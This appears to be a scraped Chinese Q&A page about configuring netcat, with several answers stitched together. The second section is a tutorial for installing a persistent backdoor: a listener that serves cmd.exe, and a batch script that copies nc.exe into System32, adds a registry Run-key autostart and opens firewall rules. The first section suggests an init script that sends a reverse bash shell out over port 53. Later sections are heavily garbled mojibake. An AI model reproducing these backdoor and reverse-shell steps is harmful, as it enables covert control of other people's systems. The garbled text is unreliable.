netcat如何配置
㈠ 为什么CentOS或Redhat的netcat命令中没有-e选项,如何才能使用此选项。不想重新编译安装。
我觉得,之所以没有这个-e参数是为了防止被控方(centos)的操作人员设置后门,
你可以尝试到etc/init.d下写一个nc的启动脚本,利用由内向外的反向链接-c参数反弹bash(可以越过防火墙)大概是“nc -nv ip地址 53 -c bash“
在攻击方进行侦听53DNS端口,等着鱼儿上钩吧!!
㈡ 如何在Windows,Linux中安装后门
0×00 准备工作
假设用户以管理员权限登录系统,在Windows 7系统上使用netcat 创建一个后门。
Netcat 功能比较单一, 缺少了许多我们渗透工作中需要的功能。为此我们将创建一个便携式的工具包来解决这个问题 :
1.下载额外的文件和附加持续.
2.编辑修改指定文件.
3.快速创建执行后门.
4.控制远程服务器并进行恶作剧 :)
为了便于你第一时间获取到你的工具包,你需要将它放置在一个独立的U盘或者在线服务器上。
便携式工具(Portable Applications)
便携式工具是那些不需要安装就能直接使用的程序,它们往往将所有的执行环境和核心程序本身一同打包成一个独立的文颤尘件,方便携带。在独立文件执行的过程中会自行释放额的需求文件,并构建一个可顺利执行目标程序的环境。
1.不依赖特定的dll(dll已经打包)
2.不依赖注册表设置(有可能自行初始化) ,不遗留下任何注册表操作痕迹
3.操作痕迹最小化,尽量避免一切不必要的操作,导致留下过多的系统操作记录
创建 Windows 7 工具集
gVim (跨平台的文本编辑器, 提供强大的命令行操作交互)
Wget (下载 windows 64 位版本)
Netcat
有Kali系统的可以用命令 “find / -name nc.exe”搜索到 http://www.kali.org/ 或者下载已经编译好的版本 http://joncraton.org/blog/46/netcat-for-windows/
0×01初试 Netcat 后门
nc.exe -dLp 449 -e cmd.exe -L 这个选项会开启一个监听服姿缓务并等待客户端连接, 在客户端连接成功之后,会提供相应的交互服务。
– p 指定程序监听的端口(非管理员权限只能设置高于1024的端口. 同时不可复用现有端口)
– e 在接收到一个客户端连接后, 会执行一个特定的程序(这里是cmd.exe), 这个程序负责接下来的会话交互(执行客户端后期提交的任何命令)
– d 采取静默监听模式,避免nc运行过程中,产生过多额外的日志迹洞模信息
Windows 7 后门安装批处理脚本
@echo off
Rem 拷贝文件到系统目录
x "%systemdrive%\%username%\Desktop\nc.exe" "C:
\Windows\System32\" -y
Rem 修改注册表,增加后门自启动代码.
reg add "HKLM\software\microsoft\windows\currentversion\run" /f /v "system" /t
REG_SZ /d "C:\windows\system32\nc.exe -Ldp 449 -e cmd.exe"
Rem 添加防火墙规则,开放监听的449端口,允许外部连接.
netsh advfirewall firewall add rule name="Rule 34" dir=in action=allow
protocol=UDP localport=449
netsh advfirewall firewall add rule name="Rule 35" dir=in action=allow
protocol=TCP localport=449
Rem 添加防火墙规则,允许nc.exe对外提供连接.
netsh advfirewall firewall add rule name="Allow Messenger" dir=in action=allow
program="C:\windows\system32\nc.exe"
㈢ ubuntu16.04怎么安装netcat
etcat-0.7.1.tar.gz 然后当然是解压了 tar zxvf netcat-0.7.1.tar.gz 解压完毕之后会生成目录,要cd进去 cd netcat-0.7.1 然后进行编译前的配置。 ./configure 配置完了之后就可以make编译了。 编译成功就生成了netcat可执行的文件了,位于src目...
㈣ 濡备綍DOS涓嫔啓涓娈典唬镰佸彂缁椤彟涓鍙扮数鑴戯纻
鍦―OS鎴朩indows锻戒护琛屼笅锛屾偍鍙浠ヤ娇鐢ㄤ互涓嬫柟娉旷紪鍐欎竴涓绠鍗旷殑锻戒护𨱒ュ皢鏂囨湰鏂囦欢鍙戦佸埌鍙︿竴鍙拌$畻链恒傝繖娑夊强浣跨敤`netcat`宸ュ叿锛屽畠鍙浠ョ敤浜庡湪缃戠粶涓婂彂阃佸拰鎺ユ敹鏁版嵁銆傝锋敞镒忥纴杩欓渶瑕佸湪鍙戦佸拰鎺ユ敹璁$畻链轰笂閮藉畨瑁卄netcat`銆
1. 镓揿紑锻戒护鎻愮ず绗︼纸DOS绐楀彛锛夈
2. 鍦ㄥ彂阃佽$畻链轰笂浣跨敤浠ヤ笅锻戒护钖锷╜netcat`链嶅姟鍣锛岀洃钖鎸囧畾镄勭鍙c傚亣璁炬偍阃夋嫨绔鍙e彿涓12345锛
杩椤皢浣跨敤`netcat`灏哷myfile.txt`鏂囦欢鍙戦佸埌鎺ユ敹璁$畻链虹殑IP鍦板潃鍜岀鍙c
4. 锲炲埌鎺ユ敹璁$畻链轰笂锛屾偍灏嗗湪钖屼竴鐩褰曚腑镓惧埌涓涓钖崭负`received.txt`镄勬枃浠讹纴鍏朵腑鍖呭惈浠庡彂阃佽$畻链烘帴鏀剁殑鏁版嵁銆
璇锋敞镒忎互涓嫔嚑镣癸细
- 璇风‘淇濆湪鍙戦佸拰鎺ユ敹璁$畻链轰笂閮藉畨瑁呬简`netcat`宸ュ叿銆
- 鎭ㄩ渶瑕佺煡阆撴帴鏀惰$畻链虹殑IP鍦板潃銆
- 鎭ㄥ彲浠ユ洿鏀规枃浠跺悕銆佺鍙e彿鍜屾枃浠惰矾寰勪互阃傚簲鎭ㄧ殑闇姹伞
杩欎釜绀轰緥锅囱炬偍鍦ㄦ湰鍦扮绣缁滀腑杩涜屾枃浠朵紶杈撱傚傛灉娑夊强鍒颁簰镵旂绣涓婄殑璁$畻链猴纴璇风‘淇濇偍閲囧彇浜嗛傚綋镄勭绣缁滃畨鍏ㄦ帾鏂斤纴锲犱负`netcat`鍙鑳戒细瀵艰嚧娼滃湪镄勫畨鍏ㄩ庨橹銆傛ゅ栵纴濡傛灉闇瑕佸姞瀵嗕紶杈掳纴鎭ㄥ彲鑳介渶瑕佽冭槛浣跨敤鍏朵粬宸ュ叿锛屽係CP鎴朣ftp銆
㈤ 鍦坸閰岖疆浜呜妭镣硅缮鏄镞犳硶杩炴帴
鑺傜偣镄勯厤缃链夎銆
纭淇濈绣缁滆繛鎺ヤ笂tcp鏄鍙浠ラ氱殑锛屽彲浠ラ忚繃netcat鍦ㄤ簩涓鑺傜偣镓鍦ㄧ殑链哄櫒涓婂垎鍒寮涓链嶅姟銆
纭淇濈绣缁滆繛鎺ユ槸阃氱殑锛屽彲浠ラ忚繃ping𨱒ユ煡鐪嬨傜‘淇濈绣缁滆繛鎺ヤ笂tcp鏄鍙浠ラ氱殑锛屽彲浠ラ忚繃netcat鍦ㄤ簩涓鑺傜偣镓鍦ㄧ殑链哄櫒涓婂垎鍒寮涓链嶅姟鍣ㄧ鍜屽㈡埛绔杩涜岄獙璇併傜‘淇濈鍙f槸阒茬伀澧椤弸濂界殑銆俥rlang镄勮妭镣规槸锏昏板湪epmd链嶅姟涓婄殑锛屾墍浠4369绔鍙h佽兘璁块梾锛屽叾娆¤妭镣圭殑锷ㄦ佺鍙f槸鍙浠ヨ块梾镄勚
㈥ netcat鍦ㄥ畨瑁卬map镞跺氨浼氩畨瑁呭悧
cent os6.5镐庝箞瀹夎卬map
濡傛灉鏄锲惧舰鐣岄溃锛屽彲浠ョ偣鍑诲惎锷ㄧ粓绔銆 涓嶈繃锛 杩椤湪浼佷笟涓涓嶉傜敤锛岄兘鏄浣跨敤镄勮繙绋嬭蒋浠剁淮鎶ょ殑銆 濡傛灉妤间富浠ュ悗链茔inux绯荤粺绠$悊锛宭inux绯荤粺寤鸿撅纴 姣斿俛pache锛 dns锛 vsftp锛宻hell缂栫▼闂棰桡纴鎴栬呮槸链塸ython镄勫紑鍙戦渶姹傦纴缃戦〉镄勶纴閮借屻
1銆佸湪瀹夎呯郴缁熸椂锛岄夋嫨涓鏂囦粎瀵瑰畨瑁呮湁鏁堬纴鍗宠╀綘鍦ㄥ畨瑁呰繃绋嬫樉绀虹殑淇℃伅鏄涓鏂囥傚湪钖庨溃镄勫畾鍒舵湇锷¢偅鍧楋纴鍙浠ラ夋嫨鏀鎸佷腑鏂囷纴涓鑸榛樿ゆ敮鎸佷腑鏂囩殑~~
2銆佸傛灉娌℃湁涓鏂囨敮鎸佷綘鍙宸插畨瑁
# yum grouplist #镆ョ湅Installed Language Groups: 涓嬫槸钖︽湁Chinese support锛屽傛灉娌℃湁锛屽彲浠ュ畨瑁匔hinese support
#yum -y groupinstall Chinese support #鍓嶆彁鏄浣犻渶瑕佹惌寤哄ソyum
3銆佺郴缁熸敼涓轰腑鏂囨敮鎸
#LANG=zh_CN.UTF-8 #涓存椂鐢熸晥
淇鏀/etc/sysconfig/i18n 锛屾案涔呯敓鏁
# vim /etc/sysconfig/i18n
LANG="zh_CN.UTF-8"
杩欎釜闇瑕佷綘閲嶅惎钖庨厤缃镓岖敓鏁